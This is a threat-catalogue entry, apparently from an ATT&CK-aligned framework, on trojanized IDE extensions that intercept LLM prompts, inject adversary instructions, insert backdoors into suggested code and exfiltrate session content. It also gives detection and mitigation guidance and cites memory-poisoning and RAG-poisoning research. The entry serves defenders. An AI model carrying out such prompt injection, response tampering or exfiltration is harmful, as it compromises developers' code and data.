AIDE-010 Persistence Coverage C ATT&CK Aligned Persistence

LLM Extension/Plugin Trojanization

AIDE-010 | ATT&CK: T1176

Description

Adversary Behavior: An adversary develops and distributes a malicious IDE extension (or modifies a legitimate one) that operates at the extension API layer where LLM prompts are constructed, transmitted, and responses are received.

AI/IDE Mechanism: IDE extension ecosystems provide APIs that enable deep access to the LLM interaction pipeline. Extensions can intercept prompts before transmission, modify prompts in transit, alter responses before display, and access telemetry and session data. Users install extensions based on functionality and ratings without verifying their interaction with LLM subsystems.

Execution Path: The malicious extension intercepts prompts before they are sent to the LLM (capturing project context, code, and developer intent), modifies prompts in transit (injecting adversary instructions), alters responses before they are displayed to the developer (inserting backdoors into suggested code), or exfiltrates prompt/response content to an external endpoint.

Security Impact: The adversary gains persistent access to the full LLM interaction pipeline — all project context, developer queries, and generated code pass through the compromised extension. This enables continuous data exfiltration, persistent prompt manipulation, and supply chain compromise of all code generated through the affected IDE instance.

Platforms

Windows macOS Linux

Detection

Monitor extension installation events and track extension permissions, particularly those accessing LLM APIs. Compare LLM API responses at the network level with the content presented to the developer to detect response modification. Inspect extension network traffic for data exfiltration patterns.

Detecting Data Components (3)

Extension Installation

Events capturing the installation or update of IDE extensions.

Extension Configuration Change

Events capturing changes to extension configuration, including changes by LLM agents.

Extension API Call

Events capturing runtime API calls made by extensions, particularly those interacting with LLM pipelines.

Mitigations (1)

Extension Security Controls

Enforce extension allowlisting from verified publishers. Flag extensions requesting LLM API access combined with network permissions. Monitor extension API calls for prompt/response interception. Restrict sideloading from non-marketplace sources.

Data Sources

Network Traffic → Network Connection Creation

Network Traffic → Network Traffic Content

Process → Process Creation

Application Log → Application Log Content

References

mitre-attack

Maps to Browser Extensions (analogous). Coverage Level C — IDE extension persistence not well-covered in detection guidance.

https://attack.mitre.org/techniques/T1176

Windsurf SpAIware (Rehberger, Aug 2025)

Memory-persistent data exfiltration from Windsurf IDE — retrieval-independent persistence through IDE memory features.

https://embracethered.com/blog/

MemoryGraft

Indirect injection targeting LLM agent long-term memory; semantic imitation heuristic exploited — poisoned records dominate retrievals up to 47.9% on GPT-4o (arXiv:2512.16962, 2025)

https://arxiv.org/abs/2512.16962

CorruptRAG

Practical RAG poisoning requiring only single poisoned text injection; 13 methods benchmarked, existing defenses fail (arXiv:2504.03957, 2025)

https://arxiv.org/abs/2504.03957

Automated Dependency Side-Loading

AI extension trojanization vector — malicious extensions intercept AI-developer communication to inject unauthorized dependencies (InstaTunnel, Feb 2026)

https://medium.com/@instatunnel/automated-dependency-side-loading-the-invisible-supply-chain-attack-via-ai-extensions-fe615eb03f19

MalTool

5,287 real-world tools with embedded malicious behaviors demonstrate extension/plugin trojanization at scale (arXiv:2602.12194, Feb 2026)

https://arxiv.org/abs/2602.12194

STIX Metadata

type	attack-pattern
id	attack-pattern--050a43f9-e16a-48a7-9753-3a36c580d4cb
spec_version	2.1
created	2026-02-23T00:00:00.000Z
modified	2026-02-23T00:00:00.000Z
created_by_ref	identity--f5b5ec62-ffbd-4afd-9ee5-7c648406e189
x_mitre_is_subtechnique	False
x_mitre_version	0.1
x_mitre_status	mapped